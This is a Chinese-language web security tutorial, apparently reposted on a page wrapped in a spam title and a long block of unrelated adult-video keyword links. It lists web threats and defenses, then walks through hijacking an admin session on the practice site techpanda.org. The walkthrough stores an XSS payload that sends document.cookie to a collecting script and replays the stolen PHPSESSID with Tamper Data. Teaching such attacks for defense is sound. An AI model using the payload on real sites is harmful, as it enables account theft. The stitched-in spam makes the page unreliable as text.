国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

實(shí)戰(zhàn)教你網(wǎng)站攻擊原理及如何防御網(wǎng)站攻擊
2018-12-12   黑客安全

提到網(wǎng)絡(luò)攻擊首先我們看看兩個(gè)問(wèn)題。什么是網(wǎng)絡(luò)應(yīng)用程序?什么是網(wǎng)絡(luò)威脅?

黑客

Web應(yīng)用程序(aka網(wǎng)站)是基于客戶端 - 服務(wù)器模型的應(yīng)用程序。服務(wù)器提供數(shù)據(jù)庫(kù)訪問(wèn)和業(yè)務(wù)邏輯。它托管在Web服務(wù)器上。客戶端應(yīng)用程序在客戶端Web瀏覽器上運(yùn)行。Web應(yīng)用程序通常用Java,C#和VB.Net,PHP,ColdFusion標(biāo)記語(yǔ)言等語(yǔ)言編寫.Web應(yīng)用程序中使用的數(shù)據(jù)庫(kù)引擎包括MySQL,MS SQL Server,PostgreSQL,SQLite等。

大多數(shù)Web應(yīng)用程序都托管在可通過(guò)Internet訪問(wèn)的公共服務(wù)器上。這使得它們易于訪問(wèn),因此容易受到攻擊。以下是常見(jiàn)的Web應(yīng)用程序威脅。

  • SQL注入 - 此威脅的目標(biāo)可能是繞過(guò)登錄算法,破壞數(shù)據(jù)等。人話:走后門
  • 拒絕服務(wù)攻擊 - 此威脅的目標(biāo)可能是拒絕合法用戶訪問(wèn)資源。人話:堵門
  • 跨站點(diǎn)腳本XSS - 此威脅的目標(biāo)可能是注入可在客戶端瀏覽器上執(zhí)行的代碼。
  • Cookie /會(huì)話中毒 - 此威脅的目標(biāo)是通過(guò)攻擊者修改Cookie /會(huì)話數(shù)據(jù)以獲取未經(jīng)授權(quán)的訪問(wèn)權(quán)限。
  • 表格篡改 - 此威脅的目標(biāo)是修改表單數(shù)據(jù),例如電子商務(wù)應(yīng)用程序中的價(jià)格,以便攻擊者可以以較低的價(jià)格獲得物品。
  • 代碼注入 - 此威脅的目標(biāo)是注入可在服務(wù)器上執(zhí)行的PHP,Python等代碼。代碼可以安裝后門,泄露敏感信息等。
  • 破壞 - 此威脅的目標(biāo)是修改網(wǎng)站上顯示的頁(yè)面,并將所有頁(yè)面請(qǐng)求重定向到包含攻擊者消息的單個(gè)頁(yè)面。

接下來(lái)我們?cè)撊绾伪Wo(hù)您的網(wǎng)站免受黑客攻擊?

組織可以采用以下策略來(lái)保護(hù)自己免受Web服務(wù)器攻擊。

  • SQL注入 - 在將用戶參數(shù)提交到數(shù)據(jù)庫(kù)進(jìn)行處理之前清理和驗(yàn)證用戶參數(shù)有助于降低通過(guò)SQL注入攻擊的可能性。MS SQL Server,MySQL等數(shù)據(jù)庫(kù)引擎支持參數(shù)和預(yù)處理語(yǔ)句。它們比傳統(tǒng)的SQL語(yǔ)句更安全
  • 拒絕服務(wù)攻擊 -如果攻擊是簡(jiǎn)單的DoS,則可以使用防火墻從可疑IP地址中刪除流量。正確配置網(wǎng)絡(luò)和入侵檢測(cè)系統(tǒng)還有助于降低DoS攻擊成功的可能性。
  • 跨站點(diǎn)腳本 -驗(yàn)證和清理標(biāo)頭,通過(guò)URL傳遞的參數(shù),表單參數(shù)和隱藏值可以幫助減少XSS攻擊。
  • Cookie /會(huì)話中毒 - 可以通過(guò)加密Cookie的內(nèi)容,在一段時(shí)間后將Cookie超時(shí),將Cookie與用于創(chuàng)建Cookie的客戶端IP地址相關(guān)聯(lián)來(lái)防止這種情況。
  • 表單回火 -這可以通過(guò)在處理之前驗(yàn)證和驗(yàn)證用戶輸入來(lái)防止。
  • 代碼注入 -可以通過(guò)將所有參數(shù)視為數(shù)據(jù)而不是可執(zhí)行代碼來(lái)防止這種情況。可以使用清理和驗(yàn)證來(lái)實(shí)現(xiàn)此目的。
  • 破壞 -一個(gè)好的Web應(yīng)用程序開發(fā)安全策略應(yīng)該確保它密封常用的漏洞來(lái)訪問(wèn)Web服務(wù)器。在開發(fā)Web應(yīng)用程序時(shí),這可以是操作系統(tǒng),Web服務(wù)器軟件和最佳安全實(shí)踐的正確配置。

最后我們來(lái)破解網(wǎng)站

我們將劫持位于www.techpanda.org的Web應(yīng)用程序的用戶會(huì)話。我們將使用跨站點(diǎn)腳本來(lái)讀取cookie會(huì)話ID,然后使用它來(lái)模擬合法的用戶會(huì)話。

假設(shè)是攻擊者可以訪問(wèn)Web應(yīng)用程序,并且他想劫持使用相同應(yīng)用程序的其他用戶的會(huì)話。假設(shè)攻擊者的訪問(wèn)帳戶是有限的,攻擊的目標(biāo)可能是獲取對(duì)Web應(yīng)用程序的管理員訪問(wèn)權(quán)限。

入門


  • 打開http://www.techpanda.org/
  • 出于實(shí)踐目的,強(qiáng)烈建議使用SQL注入獲取訪問(wèn)權(quán)限。
  • 登錄電子郵件是admin@google.com,密碼是Password2010
  • 如果您已成功登錄,那么您將獲得以下儀表板
  • 單擊“添加新聯(lián)系人”
  • 輸入以下作為名字
    1. <a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">小莫</a>  

這里,上面的代碼使用JavaScript。它添加了一個(gè)帶onclick事件的超鏈接。當(dāng)毫無(wú)戒心的用戶單擊該鏈接時(shí),該事件將檢索PHP cookie會(huì)話ID并將其與URL中的會(huì)話ID一起發(fā)送到snatch_sess_id.php頁(yè)面

輸入其余詳細(xì)信息,如下所示

  • 單擊“保存更改”

  • 您的儀表板現(xiàn)在看起來(lái)像以下屏幕

  • 由于跨站點(diǎn)腳本代碼存儲(chǔ)在數(shù)據(jù)庫(kù)中,因此每次具有訪問(wèn)權(quán)限的用戶登錄時(shí)都會(huì)加載它
  • 假設(shè)管理員登錄并點(diǎn)擊顯示為Dark的超鏈接
  • 他/她將獲得URL中顯示會(huì)話ID的窗口注意:腳本可能會(huì)將值發(fā)送到存儲(chǔ)PHPSESSID的某個(gè)遠(yuǎn)程服務(wù)器,然后用戶重定向回網(wǎng)站,就好像什么都沒(méi)發(fā)生一樣。

注意:您獲得的值可能與本教程中的值不同,但概念是相同的

使用Firefox和Tamper Data插件進(jìn)行會(huì)話模擬

下面的流程圖顯示了完成此練習(xí)必須采取的步驟。

您將需要此部分的Firefox Web瀏覽器和Tamper Data插件

  • 打開Firefox并安裝add,如下圖所

  • 搜索篡改數(shù)據(jù),然后單擊安裝,如上所示

  • 單擊接受并安裝..

  • 安裝完成后,單擊立即重新啟動(dòng)
  • 如果未顯示,請(qǐng)?jiān)贔irefox中啟用菜單欄

  • 單擊工具菜單,然后選擇防篡改數(shù)據(jù),如下所示

  • 您將獲得以下窗口。注意:如果Windows不為空,請(qǐng)點(diǎn)擊清除按鈕

  • 單擊“開始篡改”菜單
  • 切換回Firefox Web瀏覽器,輸入http://www.techpanda.org/dashboard.php,然后按回車鍵加載頁(yè)面
  • 您將從Tamper Data中彈出以下內(nèi)容

  • 彈出窗口有三(3)個(gè)選項(xiàng)。“篡改”選項(xiàng)允許您在將HTTP標(biāo)頭信息提交到服務(wù)器之前修改它。
  • 點(diǎn)擊它
  • 您將看到以下窗口


  • 復(fù)制從攻擊URL復(fù)制的PHP會(huì)話ID,并在等號(hào)后粘貼它。你的價(jià)值現(xiàn)在應(yīng)該是這樣的
    1. PHPSESSID = 2DVLTIPP2N8LDBN11B2RA76LM2  
  • 單擊“確定”按鈕
  • 您將再次獲得Tamper數(shù)據(jù)彈出窗口

  • 取消選中要求繼續(xù)篡改的復(fù)選框?
  • 完成后單擊“提交”按鈕
  • 您應(yīng)該能夠看到儀表板,如下所示注意

  • :我們沒(méi)有登錄,我們使用我們使用跨站點(diǎn)腳本檢索的PHPSESSID值來(lái)模擬登錄會(huì)話

熱詞搜索:網(wǎng)站 攻周

上一篇:安全使用Tor瀏覽器的7個(gè)技巧
下一篇:數(shù)據(jù)中心中所使用的那些技術(shù)詳解!

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
91麻豆精品国产91| 91婷婷韩国欧美一区二区| 美腿丝袜亚洲色图| 成人午夜私人影院| 国产精品久久久久久久久图文区 | 亚洲午夜日本在线观看| 91蜜桃网址入口| 亚洲国产精品尤物yw在线观看| 欧美性一二三区| 久久国产福利国产秒拍| 国产精品女同互慰在线看 | 成人亚洲一区二区一| 中文字幕一区视频| 欧美日韩免费电影| 精品一区二区三区免费播放| 国产日韩欧美一区二区三区综合| 成人黄色小视频在线观看| 亚洲一线二线三线久久久| 欧美精品一区二区三区在线 | 久久久久久久久97黄色工厂| 91在线观看污| 久久不见久久见免费视频7| 成人欧美一区二区三区视频网页 | 欧美久久高跟鞋激| 成人三级伦理片| 日本91福利区| 亚洲免费观看高清完整版在线观看 | 一区二区三区欧美视频| 久久午夜羞羞影院免费观看| 欧美丝袜丝交足nylons| 99麻豆久久久国产精品免费 | 91麻豆精品国产91久久久久久| 成人免费高清在线| 久久av中文字幕片| 三级不卡在线观看| 亚洲bt欧美bt精品| 亚洲激情五月婷婷| 亚洲丝袜精品丝袜在线| 国产亚洲欧美日韩在线一区| 欧美一级一级性生活免费录像| 色94色欧美sute亚洲13| 97久久超碰国产精品| 国产69精品一区二区亚洲孕妇| 九九精品视频在线看| 免费观看在线色综合| 亚洲图片欧美色图| 一区二区三区高清在线| 亚洲精品五月天| 亚洲人精品午夜| 久久久久国产精品免费免费搜索| 91福利精品第一导航| eeuss鲁片一区二区三区| 国产精品77777| 国产伦理精品不卡| 国产精品一区二区久久不卡| 久久成人精品无人区| 韩国av一区二区| 精品午夜久久福利影院| 久久99在线观看| 国产在线视视频有精品| 国产一区91精品张津瑜| 国产精品自拍毛片| 不卡大黄网站免费看| 99re这里只有精品视频首页| 91麻豆6部合集magnet| 色欧美片视频在线观看| 欧美日韩国产片| 日韩三级中文字幕| 日本一区二区三区dvd视频在线| 国产精品久久影院| 丝袜美腿亚洲一区二区图片| 奇米影视在线99精品| 国产一区在线观看视频| 成人av网址在线| 欧美制服丝袜第一页| 6080国产精品一区二区| 精品福利视频一区二区三区| 国产精品视频看| 亚洲图片欧美视频| 国产高清无密码一区二区三区| 日韩精品一区二区三区中文不卡 | 国产亚洲欧洲997久久综合| 国产欧美日产一区| 亚洲国产日韩a在线播放性色| 青娱乐精品视频在线| 不卡的av在线播放| 91精品国产综合久久久蜜臀图片| 久久久精品日韩欧美| 一个色妞综合视频在线观看| 美女尤物国产一区| 99精品久久99久久久久| 日韩视频123| 亚洲小说春色综合另类电影| 国产精品一区二区在线看| 欧美曰成人黄网| 中文字幕免费在线观看视频一区| 亚洲高清三级视频| 成人福利视频网站| 欧美不卡视频一区| 午夜电影久久久| caoporen国产精品视频| 精品久久久久久久久久久院品网 | 亚洲黄色av一区| 成人综合在线观看| 欧美一卡在线观看| 亚洲成年人网站在线观看| 91黄色小视频| 国产色91在线| 麻豆精品一二三| 欧美日韩国产一级片| 亚洲天堂免费看| 国产a级毛片一区| 2021国产精品久久精品| 免费视频一区二区| 欧美一区二区三区免费观看视频| 一区二区三区四区乱视频| 成人精品一区二区三区四区| 久久青草国产手机看片福利盒子| 男女性色大片免费观看一区二区| 在线免费视频一区二区| 1区2区3区欧美| 91丨九色丨黑人外教| 国产精品久久久久影视| 成人黄色在线网站| 中文字幕一区二区三中文字幕| 国产.精品.日韩.另类.中文.在线.播放 | 日韩免费看的电影| 蜜桃av一区二区| 精品国产乱码久久久久久1区2区| 日韩精品1区2区3区| 欧美色视频一区| 日韩影院免费视频| 欧美一区二区三区色| 天天色综合天天| 日韩亚洲欧美成人一区| 麻豆91在线播放免费| 久久久久久亚洲综合影院红桃| 国产成人在线视频免费播放| 亚洲国产精品av| 在线看日本不卡| 日韩影院精彩在线| 久久亚洲精品小早川怜子| 国产69精品久久99不卡| ●精品国产综合乱码久久久久 | 一本色道久久综合亚洲91| 亚洲色大成网站www久久九九| 在线国产亚洲欧美| 日韩高清在线观看| 欧美www视频| 99国产精品国产精品毛片| 亚洲午夜久久久| 日韩欧美激情一区| av在线综合网| 香港成人在线视频| 久久久午夜精品理论片中文字幕| 粉嫩av一区二区三区| 亚洲资源中文字幕| 337p粉嫩大胆噜噜噜噜噜91av| 99麻豆久久久国产精品免费优播| 婷婷夜色潮精品综合在线| 国产亚洲婷婷免费| 欧美精品少妇一区二区三区| 国产在线精品国自产拍免费| 最新久久zyz资源站| 777午夜精品视频在线播放| 国产91精品入口| 日韩中文字幕不卡| 国产精品久久久久久一区二区三区| 91久久精品国产91性色tv| 国产一区二区三区久久悠悠色av| 亚洲人吸女人奶水| 久久久欧美精品sm网站| 在线观看视频欧美| 福利电影一区二区三区| 爽爽淫人综合网网站| 国产精品久久久久久户外露出 | 精品福利在线导航| 欧美精品第1页| 91免费精品国自产拍在线不卡| 精品一区二区三区在线播放视频| 亚洲国产精品一区二区久久| 欧美国产一区在线| 精品久久国产97色综合| 国产女同互慰高潮91漫画| 欧美色男人天堂| 一本大道久久精品懂色aⅴ| 国产福利不卡视频| 美女脱光内衣内裤视频久久网站| 国产精品日韩成人| 国产亚洲va综合人人澡精品 | 日韩精品一区二区三区视频播放| 91在线精品一区二区| 成人中文字幕合集| 国产精品亚洲а∨天堂免在线| 偷偷要91色婷婷| 亚洲电影在线播放| 亚洲国产另类av| 亚洲va欧美va人人爽| 日日摸夜夜添夜夜添精品视频| 亚洲一级二级在线|